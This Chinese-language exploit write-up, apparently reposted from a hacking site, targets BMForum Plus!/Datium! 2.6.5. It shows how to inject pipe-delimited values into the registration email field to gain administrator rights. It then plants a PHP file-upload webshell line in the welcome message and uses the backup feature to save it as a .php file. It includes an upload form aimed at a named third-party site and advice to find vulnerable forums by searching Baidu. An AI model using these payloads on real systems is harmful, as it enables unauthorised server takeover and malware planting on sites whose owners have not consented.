BMF-提升權限之旅!
作者:ezboy 來源:火狐www.wrsky.com BMF-提升權限之旅! 主要漏洞是發生在註冊會員時,部分資料沒有過濾|這個符號!! 而這個討論區會員的存檔格式為 XXX|XXXX|XXXX| 用|做為區隔的 email這個欄位剛好沒被過濾到 提交 test@test.com|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0| 這樣的格式 可以比照管理員的註冊格式,發現第19格為0為管理員!!! 註冊完畢之後發現身分為管理員了!! ------------------ 可以在公告裡添加木馬,然後利用論壇備份成php檔!!! ....End |
利用过程:
受影响版本:
BMForum Plus! 2.6.5 贺岁版
BMForum Datium! 2.6.5 贺岁版
在baidu中搜以上版本,随便选一个,进入注册用户页面:
利用注册选项过滤不完整攻击。
mail选项填写格式:
test@test.com|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|
注册一用户eztest,密码:eztest,mail格式如上
登陆,点管理中心,用上面的用户和密码可以进入管理后台界面。
管理页面:adminindex.php
注册欢迎段信息的正文处输入;
';copy($_FILES[mf][tmp_name],$_FILES[mf][name])?>
论坛备份:
选择备份欢迎信息文件,其它都去掉
指定备份目录为:
备份路径:
face/222 other目录是必须的。
完整路径:
http://saiy.77yan.com/wrsky/face/222/other/welcome.php
phpcl.htm
<form ENCTYPE="multipart/form-data" action="http://saiy.77yan.com/wrsky/face/222/other/welcome.php" method="POST">
<input name="mf" type="file">
<input value="send" type="submit">
</form>
上传马2005.php,马的路径就是: